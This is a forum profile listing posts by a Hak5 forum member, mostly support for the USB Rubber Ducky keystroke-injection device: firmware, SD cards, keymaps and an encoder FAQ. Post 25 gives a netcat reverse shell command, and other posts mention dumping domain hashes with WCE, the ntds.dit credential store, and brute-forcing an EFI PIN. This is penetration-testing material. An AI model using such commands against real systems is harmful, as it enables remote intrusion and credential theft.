no42
Dedicated Members
  • Posts: 925
  • Days Won: 17

Everything posted by no42

  1. Only triggers when LEDs are on, so either double tap the key, or have the relevant key press as the first line in the specific payload injectX.bin. I can put protection in to prevent payloads interfering - can't remember if I did this. In this firmware? The more feedback we receive the better. Thanks Snake
  2. http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/ The guy writes a brute-force script for his Teensy to brute-force his EFI PIN. Unfortunately, he didn't realise his mistake in his original Teensy code (hey, it can happen to any of us). He failed at brute-forcing the PIN! His mistake has since been pointed out, and corrected by the community. Bottom line is maybe "He should have bought a Ducky"; the easy to use Ducky Script language and Darren's Android Brute-Force Payload (with minor mods) probably could have unlocked the EFI within 24hrs.
  3. Probably down, until Darren updates it with new content. He's having fun round Europe at the moment, guess we just have to wait. For now, you have some sample payloads on github, and other stuff on ducky-decode:
       https://github.com/hak5darren/USB-Rubber-Ducky/wiki/
       http://code.google.com/p/ducky-decode/
     Anything else, just ask on the forum... I've implemented tag posting in topic titles, so it's easy to use Google for searching for posts on a given subject. Google Dorks:
       site:forums.hak5.org [firmware]
       site:forums.hak5.org [encoder]
       site:forums.hak5.org [payload]
       site:forums.hak5.org [question]
  4. What VPN have you connected to? OpenVPN is used to create an encrypted tunnel between your computer and a network, e.g. home network / office network / VPS service. If you want to access websites with an anonymous IP, I suggest looking at TOR (and privoxy).
  5. Apart from using Linux and dfu-programmer to download the firmware images, and providing the MD5s, there is no way to tell! I can't imagine the hardware changing, as that could lead to incompatibility with the community firmwares; it's got to be newer firmware.
  6. Depends how you extracted the key - it might have non-printable characters, it could be encrypted? Just whack it in wpa_supplicant - it should still work. If you're on Windows it should still work if you use it as the passphrase. If it's just hex, use a hex to ascii converter (plenty online), see if it can be translated directly to ascii, but you may have non-printable characters.
  7. I'm inclined to say "no", http://www.pcreview.co.uk/forums/move-registry-hibernate-once-resume-many-t529864.html But you can move the ntds.dit (where all domain creds are held) http://support.microsoft.com/kb/257420 http://www.frickelsoft.net/blog/?p=165
  8. Apparently, this would only be marginal, not sure it's worth the effort.
  9. Yes (Version 2.1), but you have to flash it yourself. You weren't dreaming, the post is here: http://forums.hak5.org/index.php?/topic/28670-question-ducky-as-a-plain-old-usb-drive/ Maximising the most out of the SPI bandwidth. It would be nice to achieve 4MB/s but that means money to the SD association ($2000USD+ for membership per year); any increase in cost would raise the cost of the Ducky, and we want to keep the cost as cheap as possible.
  10. I'm not involved in the hardware design/production. But I believe they're still the same chip. Are you running different firmware(s)? Also, it could be down to the quality of the sdcard? I'm still on the red one, with a previously owned sdcard (sdcard that came with it died).
  11. Run WCE (Windows Credential Editor) - to dump domain hashes, and any plain text hashes on a given dc server.
  12. honeynet
      The Sebek server was Linux only, the clients were available for win32 and Linux. However, I don't think the project is maintained, so may require an older kernel. Alternatives, you may want to read up on: http://honeypots.sourceforge.net/monitoring_vmware_honeypots.html http://www.spitzner.net/honeypot.html http://www.tracking-hackers.com/solutions/
  13. Are you sure it's the Ducky, and not the sdcard? Are there any lights? Does the Ducky register in Device Manager (Windows) (or dmesg on Linux)?
  14. Maybe we should collate and advertise all the interesting things the Duck can do? To gain access to systems in Social Engineering engagements. To prove the gaps in Data Loss Prevention Policies. To help automate the process of complex tasks (e.g. build wireless profiles on corporate wireless networks that use PEAP and 802.1x authentication - I've seen this cause confusion in the office!). To demo the possibility of behaving like a yubi-key, for improved passwords.
  15. Looks like a good idea. But isn't c:\windows\system32 protected? You need admin permissions to write there, and the user may not have these rights?
  16. This is what Atmel gave me: and I know you're proficient at reading and modifying the code, and you appear to have more development time than me at the moment. I challenge you to do better than my improvements! You can either give a man a fish for a day, or give him a rod and teach him to fish for life...
  17. GLOBAL_WR_PROTECT - Tried that, it didn't work. So I dug a little deeper and found http://forums.hak5.org/index.php?/topic/28512-question-secure-sd-duck/?p=216531 Last option is probably to change the way all the sd_mmc commands like sd_mmc_spi_write_sector_from_ram work. I haven't got a lot of time at the moment, and I appear to be a 1-man-band! until others catch up? If you can work it out, share the source, and we can all test it.
  18. It means all interfaces, so if your IP is 10.1.1.1 on eth0, and 192.168.1.1 on wlan0, your service appears on 10.1.1.1 (eth0), 192.168.1.1 (wlan0) & 127.0.0.1 (localhost).
  19. You could leave the "Naked Duck" (this time the exposed board not the firmware) plugged in, and just press the GPIO (ducky's tiny button) to replay the sequence.
  20. Do you have the output of these commands from above:
        make && make plugins
        sudo make suidinstall
        sudo make plugins-install
      The only thing I can think of is that the plugin hasn't been created due to some error?
  21. Multiple different types of cards have been tested by users. I personally have used 64MB up to 1GB with no problems. My cards have not been partitioned, so they use the full allocated space, and have been formatted in FAT (Windows) or VFAT (Unix).
  22. Having previous experience with BackTrack, I think you'll find other Debian-based distros easier: Debian, Ubuntu, Mint. Your choice? Kali will probably be available at Defcon in August?
  23. Will the Ducky work straight away?
      The Ducky is currently pre-loaded with the stock original (duck) HID injecting firmware. It will work straight out of the box. Note: Plain old HID injection (keyboard emulation) - no fancy features!

      Ducky Resources/Websites?
      The main website: http://usbrubberducky.com
      Also try: https://github.com/hak5darren/USB-Rubber-Ducky/wiki http://code.googlde.com/p/ducky-decode/ or even this forum...

      I inserted my Ducky into a Windows Computer and nothing happens?
      The Ducky’s LEDs are programmed to provide feedback to the user:
      A flashing GREEN LED usually means the computer and Ducky are talking to each other.
      A flashing RED LED means the Ducky can’t read the SDcard.
      If you did not notice any LEDs: Sometimes, the host OS is a bit slow and misses the Ducky’s commands while it is enumerating the device. Try pushing the Ducky's GPIO Button, it calls a REPLAY function? The Ducky’s button acts as a simple replay button in its default setting. However, this button is also used to put the Ducky into DFU-MODE. Check the Ducky's Button is not stuck. Try pushing the button on the Ducky… any lights? actions?

      My Ducky is flashing RED, what now?
      Take out the SDcard (it can be stiff first of all, so don’t worry), some people have used tweezers or have been fairly gentle with a flat-tipped screwdriver. Try reinserting the SDcard, or alternatively insert the card into an SDcard adapter/reader, and see if the host OS (Windows/Unix/OSX) can natively read the card. If the host OS can read the card, re-insert it back into the Ducky and try again. If the host OS can’t read the card, you may try re-formatting the card (FAT), or simply try another SDcard that you may have (commonly found in mobile phones, cameras, etc).

      When I plug in the Ducky, it does something weird, and executes everything on my desktop?
      The secret behind multi-OS support was the timings in the USB stack. The Ducky is real fast, as such the Ducky will start quacking commands as soon as it is inserted into the computer. Try adding a wait command “DELAY 3000” as the first line in your Ducky Script. This gives the host OS enough time to enumerate the Ducky as a HID keyboard. Note: You may need to tweak the DELAY command depending on your system(s).

      I'm from X country, the Ducky fires off seemingly random keys, what is going on?
      The stock duckencoder.jar only supports keymaps for USA. However, the community Duckencoder (available from http://code.google.com/p/ducky-decode) can support more language/keymaps. Please read more below!

      I’m from X country, my language is not supported, the Ducky is pointless.
      Please don’t think like that. The solution is simple. Get onto this forum and ask for support. We can guide you through the process of creating a new key-map which will benefit everyone. Without the community, this project cannot succeed. :) We need you! And your feedback is welcomed! :)

      What Languages are Currently Supported?
      US (United States), UK (United Kingdom), DE (German), DK (Danish), FR (French), BE (Belgian), NO (Norwegian), PT (Portuguese), SV (Swedish), IT (Italian), ES (in development get in touch), RU (in development get in touch)

      OK. How do I run the DuckEncoder.jar using a specific keyboard map?
      Depending on the filename it's either encoder.jar/duckencoder.jar. Make sure you have java installed (if not visit http://www.oracle.com/technetwork/java/javase/downloads/index.html)
      Command:
        java -jar duckencoder.jar -l <location of language.properties> -i input.txt
      Example Windows:
        java -jar duckencoder.jar -l resources\uk.properties -i input.txt
      Example Linux/OSX:
        java -jar duckencoder.jar -l resources/uk.properties -i input.txt
      Note: the different direction of the \ / . Also if -l is not specified it defaults to American (USA).

      What Filesystems are Supported?
      Atmel AVR's only support the FAT filesystem. Therefore, the Ducky is limited to reading FAT formatted sdcards. Depending on your OS this may be either FAT, FAT16, FAT32, VFAT. (For sdcards over 2GB it has to be FAT32/VFAT)

      I think my Ducky is Dead?
      Don’t Panic! Check the FAQ's above, you may want to try flashing the Ducky, to rule out software errors. If this all fails, it's likely a hardware fault / Ducky has become damaged in the post (it can happen). There is a decent Hak5 Returns/Exchange Policy, just contact shop@hak5.org.

      The Micro SDcard is Stuck, How do I get it out?
      Initially the micro sdcard may appear to be stuck or jammed. Do not worry! Many users have used tweezers or a small flat-head screwdriver to prize the card out of the Ducky's sd-slot (using the lip at the end of the card). Now the sdcard-slot is very stiff at first, repeatedly inserting and removing the sd-card several times will slowly loosen the slot, making it easier in the future to extract and replace the micro sdcard.

      Encoder / Java Woes
      If you get the following error with the Encoder:
        Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0
      It means that your version of Java is outdated (likely version 1.6.x), the current Encoder is pre-compiled with version 1.7.25. You can either update Java to the latest version, or download the source, and use the java jdk to compile your own version compatible with 1.6.x. Full instructions are on the ducky-decode website (above).
  24. Ducky only supports the FAT filesystem! Format as FAT, FAT16, FAT32, VFAT (depending on OS).
  25. netcat reverse shell (provided you're using TwinDuck firmware): $ %myd%\nc -e cmd.exe [ip] [port]